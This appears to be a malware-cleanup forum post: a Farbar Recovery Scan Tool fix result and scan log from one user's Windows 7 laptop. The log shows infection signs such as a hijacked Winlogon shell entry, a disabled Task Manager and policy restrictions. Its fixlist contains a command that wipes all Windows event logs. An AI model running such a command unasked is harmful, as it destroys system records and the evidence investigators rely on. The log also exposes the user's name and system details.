CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{EF076C91-DC9E-43E3-84ED-3D219E065A4F}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.302\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-7682389-3612777877-391866582-1000_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll => No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll -> No File
ContextMenuHandlers1: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers4: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
ContextMenuHandlers6: [IObitUnstaler] -> {836AB26C-2DE4-41D3-AC24-4C6C2699B960} => C:\Program Files (x86)\IObit\IObit Uninstaller\IUMenuRight.dll -> No File
CMD: FOR /F "usebackq delims==" %i IN (`wevtutil el`) DO wevtutil cl "%i"
Reboot:
 
 
*****************
 
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D4A518A-DF9A-4EF5-B2C9-BCCA25713362}" => not found
"C:\Windows\System32\Tasks\{3A66CE80-4733-4203-9F7A-462BED78E89F}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3A66CE80-4733-4203-9F7A-462BED78E89F}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA2E555B-536B-40B0-8F32-8AE50F08B90F}" => not found
"C:\Windows\System32\Tasks\igfxhk" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\igfxhk" => not found
"C:\Users\Vladana\AppData\Roaming\Terq" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D00D3C68-28B6-430D-83FD-061E0EAFCDA9}" => not found
"C:\Windows\System32\Tasks\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9194DE95-4B06-4F9D-B927-18DB5B401FBF}" => not found
"C:\Users\Vladana\AppData\Local\TNT2" => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}" => not found
"HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F}" => not found
HKLM\Software\Classes\PROTOCOLS\Handler\skype4com => not found
HKLM\Software\Classes\PROTOCOLS\Handler\WSKVAllmytubechrome => not found
 
 
Copy of FRST.txt:
 
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14-11-2019
Ran by Vladana (administrator) on VLADANA-PC (FUJITSU LIFEBOOK AH512) (18-11-2019 20:50:59)
Running from C:\Users\Vladana\Desktop
Loaded Profiles: Vladana (Available Profiles: Vladana)
Platform: Windows 7 Ultimate (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Adobe Inc. -> Adobe Systems) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApMsgFwd.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\ApntEx.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Apoint.exe
(Alps Electric Co., LTD. -> Alps Electric Co., Ltd.) C:\Program Files\Apoint2K\Hidfind.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\PSUService.exe
(FUJITSU LIMITED -> FUJITSU LIMITED) C:\Program Files\Fujitsu\PSUtility\TrayManager.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNAutoCon.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNetDm.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe
(FUJITSU LIMITED) [File not signed] C:\Program Files\Fujitsu\Plugfree NETWORK\PFNTray.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Intel Corporation - Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Mobile Wireless Group -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel® Upgrade Service -> Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(iSkySoft) [File not signed] C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc) C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe
(Mixbyte Inc -> ) C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Popcorn Time) [File not signed] C:\Program Files (x86)\Popcorn Time\Updater.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(WONBO TECHNOLOGY Co.,LIMITED -> ) C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13374568 2011-12-13] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg_DTS] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2277992 2011-11-15] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [589176 2011-12-20] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)
HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11406608 2011-12-19] (Intel Corporation - Mobile Wireless Group -> Intel Corporation)
HKLM\...\Run: [LoadFUJ02E3] => C:\Program Files\Fujitsu\FUJ02E3\fuj02e3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [PSUTility] => C:\Program Files\Fujitsu\PSUtility\TrayManager.exe [169368 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadFujitsuQuickTouch] => C:\Program Files\Fujitsu\Application Panel\QuickTouch.exe [158024 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [LoadBtnHnd] => C:\Program Files\Fujitsu\Application Panel\BtnHnd.exe [23368 2011-09-30] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [268680 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
HKLM-x32\...\Run: [IndicatorUtility] => C:\Program Files (x86)\Fujitsu\Fujitsu Hotkey Utility\IndicatorUty.exe [48752 2010-09-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM-x32\...\Run: [DivXMediaServer] => C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe [1058512 2018-12-18] (DivX, LLC. -> DivX, LLC)
HKLM-x32\...\Run: [NSU_agent] => C:\Program Files (x86)\Nokia\Nokia Software Updater\nsu3ui_agent.exe [190768 2012-02-28] (Nokia -> )
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [KeepVidProUpdateHelper.exe] => C:\Program Files (x86)\KeepVid\KeepVid Pro\KeepVidProUpdateHelper.exe [33912 2017-08-15] (WONBO TECHNOLOGY Co.,LIMITED -> )
HKLM-x32\...\Run: [iSkysoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\iSkysoft\iSkysoft Helper Compact\ISHelper.exe [2066432 2014-10-31] (iSkySoft) [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [644552 2019-07-04] (Oracle America, Inc. -> Oracle Corporation)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [240512 2019-10-25] (Mixbyte Inc -> )
HKLM-x32\...\Run: [NBKeyScan] => "C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\Winlogon: [Shell] explorer.exe,d.exe
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [Google Update] => C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\GoogleUpdateCore.exe [218920 2019-11-05] (Google Inc -> Google LLC)
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => "C:\Program Files (x86)\Common Files\Nero\Lib\NMBgMonitor.exe"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\RunOnce: [Uninstall C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Vladana\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64"
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\MountPoints2: {da4eedc7-7be1-11e2-8ac3-806e6f6e6963} - E:\start.exe
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\scrnsave.scr [11264 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\78.0.3904.97\Installer\chrmstp.exe [2019-11-08] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk [2016-07-06]
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files (x86)\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZenMate.bat [2019-11-16] () [File not signed]
GroupPolicy: Restriction - Chrome <==== ATTENTION
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {100579BF-7099-45D9-81DA-9283171425EF} - System32\Tasks\Opera scheduled Autoupdate 1433936833 => c:\program files (x86)\opera\launcher.exe [1534488 2019-11-05] (Opera Software AS -> Opera Software)
Task: {1BA80324-DEDD-4A84-B6B2-CA83338FEFC4} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {250DFF6E-ACA0-469C-AE95-348B168F5625} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_Plugin.exe [1457720 2019-11-13] (Adobe Inc. -> Adobe)
Task: {31E39139-7D23-449D-BCED-F7C976E90C09} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1240656 2019-09-10] (Adobe Inc. -> Adobe Systems)
Task: {3647BA06-A942-4A3A-A231-81D956C0A720} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000Core => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {3CDCC095-85A8-4F47-A3FD-E5901E10F3FF} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [369752 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {417C02B1-A8B8-4232-9ECA-7B637FC59D88} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-7682389-3612777877-391866582-1000UA => C:\Users\Vladana\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-29] (Google Inc -> Google Inc.)
Task: {52B88261-7B2C-4805-AC71-BEABEC2ACC7E} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {64B1DDAF-9698-4A74-994F-0A07F4D7B428} - System32\Tasks\{EF41326F-22E8-4DCF-A020-C6061802D389} => C:\Windows\system32\pcalua.exe -a C:\Users\Vladana\Desktop\avast_secureline_setup.exe -d C:\Users\Vladana\Desktop
Task: {7795D282-1AC8-4061-8740-20E3A1600B28} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [3933576 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
Task: {82855C30-C4B7-4A15-8981-4489BC782605} - System32\Tasks\DivXUpdate => C:\Program Files (x86)\Common Files\DivX Shared\DivX Update\DivXUpdate.exe [68568 2017-08-02] (DivX, LLC -> DivX, LLC)
Task: {88983266-6574-4D42-9429-D9F16127D4A3} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-11-13] (Adobe Inc. -> Adobe)
Task: {8C89DC2A-A626-4A37-9C20-27E3EAD3A4E5} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {8D71D9D7-DCCC-4240-BD4F-C4CA801119C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {99C2A032-6D1C-441F-87FE-DA0735A1B827} - System32\Tasks\{6243CAD4-3DB1-45D4-933D-254A23B4CA85} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe" -c -bootremove -uninst:RelevantKnowledge
Task: {9E09A37F-ED36-420C-A03C-DE3C2082D6BE} - System32\Tasks\{375818AB-9982-4CB0-BF65-E9B77DBF0F5C} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Car Thief 6 Full\Uninstall.exe" -c "C:\Program Files (x86)\Car Thief 6 Full\install.log"
Task: {A13BDE9B-63C9-405F-A251-35FF14182E3A} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-18] (AVAST Software s.r.o. -> AVAST Software)
Task: {AEC4A61B-DBB5-42E3-9467-8E539CA4C0CF} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [147016 2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
Task: {C3E6B74D-A015-41CB-880A-351C9A99C7A1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-09-06] (Google Inc -> Google Inc.)
Task: {CFBA6569-6A55-4FC1-A592-F5F587B9D002} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_293_pepper.exe [1453112 2019-11-13] (Adobe Inc. -> Adobe)
Task: {D3B04CF0-75EA-4648-ACB9-9595936714D9} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [560192 2014-10-29] (RealNetworks, Inc. -> )
Task: {EF68E912-4810-45BB-A8DF-394E2CB49789} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [141312 2014-10-30] (RealNetworks, Inc.) [File not signed]
Task: {F41616F1-BAE7-4545-B894-B26DB5462DA7} - System32\Tasks\SafeZone scheduled Autoupdate 1458718670 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {F99782F5-00F3-46F3-B278-C98C01F39A08} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0C2497A5-01F6-4BCC-9CA4-707802C9870D}: [DhcpNameServer] 10.0.0.1
Tcpip\..\Interfaces\{935B787B-988D-48CA-B7C2-9CD4F281E961}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{E0977D5E-E20A-454E-B20E-ED97A614D189}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-7682389-3612777877-391866582-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-26] (RealNetworks, Inc. -> RealDownloader)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\jp2ssv.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
 
FireFox:
========
FF DefaultProfile: 3mk9fbgv.default-1535656138801
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Sunbird\Profiles\qf1m1mra.default [2016-08-26]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\[email protected] [not found]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Sunbird\extensions\{e2fda1a4-762b-4020-b5ad-a41df1933103} [not found]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 [2019-11-09]
FF Homepage: Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801 -> hxxps://www.google.com/webhp?complete=0&hl=en
FF Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\[email protected] [2019-11-08]
FF Extension: (Video | GIF Downloader for Twitter) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7bcecd12-7e59-44fd-b721-8852ae8b20a8}.xpi [2019-08-24]
FF Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{7fee47a1-8299-4576-90bf-5fd88d756926}.xpi [2019-08-24]
